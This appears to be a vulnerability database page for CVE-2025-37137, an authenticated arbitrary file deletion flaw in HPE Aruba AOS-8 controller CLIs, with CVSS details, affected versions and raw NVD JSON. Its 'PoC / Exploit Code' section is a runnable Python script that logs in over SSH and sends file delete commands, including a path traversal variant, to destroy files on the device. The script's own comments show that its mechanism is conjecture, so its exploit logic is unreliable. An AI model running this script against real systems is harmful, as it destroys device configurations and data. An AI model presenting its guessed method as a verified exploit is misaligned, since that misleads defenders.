Security Vulnerability Report
CVE-2025-37137 CVSS 6.5 MEDIUM

Published: 2025-10-14 17:15:40
Last Modified: 2025-11-12 21:06:42

Description

Arbitrary file deletion vulnerabilities have been identified in the command-line interface of an AOS-8 Controller/Mobility Conductor. Successful exploitation of these vulnerabilities could allow an authenticated remote malicious actor to delete arbitrary files within the affected system.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* (versions from 8.10.0.0 up to, excluding, 8.10.0.19) - VULNERABLE
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* (versions from 8.12.0.0 up to, excluding, 8.12.0.6) - VULNERABLE
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* (versions from 8.13.0.0 up to, excluding, 8.13.1.0) - VULNERABLE
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* (versions from 10.4.0.0 up to, excluding, 10.4.1.9) - VULNERABLE
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* (versions from 10.7.0.0 up to, excluding, 10.7.2.1) - VULNERABLE
HPE Aruba Networking AOS-8 Controller (for the exact affected versions, refer to the official HPE security bulletin hpesbnw04957en_us)
HPE Aruba Networking AOS-8 Mobility Conductor (for the exact affected versions, refer to the official HPE security bulletin hpesbnw04957en_us)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-37137 - HPE Aruba AOS-8 CLI Arbitrary File Deletion PoC
# This PoC demonstrates the concept of exploiting arbitrary file deletion
# via the AOS-8 CLI interface with high-privilege authenticated access.
import sys
import time

import paramiko


def exploit_aruba_cli(target_ip, port, username, password, target_file):
    """
    Exploit arbitrary file deletion vulnerability in HPE Aruba AOS-8 CLI.

    Prerequisites:
    - Valid high-privilege credentials (admin/root level) on the AOS-8 device
    - Network access to the SSH/CLI management interface

    Args:
        target_ip: IP address of the AOS-8 Controller/Mobility Conductor
        port: SSH port (default: 22)
        username: High-privilege username
        password: Password for authentication
        target_file: Absolute path of the file to delete (e.g., /flash/config.cfg)
    """
    try:
        # Establish SSH connection to the AOS-8 device
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        client.connect(target_ip, port=port, username=username,
                       password=password, timeout=10)

        # Invoke an interactive shell session on the CLI
        shell = client.invoke_shell()

        # Enter enable mode (requires high privilege)
        shell.send('enable\n')
        time.sleep(1)

        # Attempt arbitrary file deletion via path traversal / absolute path
        # The vulnerable CLI command may accept unsanitized file paths
        delete_cmd = f'delete flash:/{target_file}\n'
        shell.send(delete_cmd)
        time.sleep(1)

        # Alternative: directory traversal to delete arbitrary system files
        traversal_cmd = f'delete flash:/../../..{target_file}\n'
        shell.send(traversal_cmd)
        time.sleep(1)

        # Read output
        output = shell.recv(65535).decode('utf-8', errors='ignore')
        print(f"[*] Command output:\n{output}")

        client.close()
        print(f"[+] Exploitation attempt completed against {target_ip}")
    except Exception as e:
        print(f"[-] Exploitation failed: {e}")
        sys.exit(1)


if __name__ == "__main__":
    if len(sys.argv) != 6:
        print(f"Usage: {sys.argv[0]} <target_ip> <port> <username> <password> <target_file>")
        print(f"Example: {sys.argv[0]} 192.168.1.1 22 admin password123 /flash/config.cfg")
        sys.exit(1)
    exploit_aruba_cli(sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4], sys.argv[5])

References

https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04957en_us&docLocale=en_US (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-37137", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:15:40.413", "lastModified": "2025-11-12T21:06:42.430", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Arbitrary file deletion vulnerabilities have been identified in the command-line interface of an AOS-8 Controller/Mobility Conductor. Successful exploitation of these vulnerabilities could allow an authenticated remote malicious actor to delete arbitrary files within the affected system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.10.0.0", "versionEndExcluding": "8.10.0.19", "matchCriteriaId": "3D5F48C7-AD51-4641-9CBA-9DE9B516819E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.12.0.0", "versionEndExcluding": "8.12.0.6", "matchCriteriaId": "057AA8F5-FF66-44E9-8E06-D2B9E8B91AD2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.13.0.0", "versionEndExcluding": "8.13.1.0", "matchCriteriaId": "D4B066B5-D01B-43AE-B4DC-AF560D6B953C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", 
"versionStartIncluding": "10.4.0.0", "versionEndExcluding": "10.4.1.9", "matchCriteriaId": "04F61E46-8412-4B8D-BE7B-EBF61BE52C54"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.7.0.0", "versionEndExcluding": "10.7.2.1", "matchCriteriaId": "BEF8618F-C126-4F8F-951F-6D62FE8FAB22"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04957en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}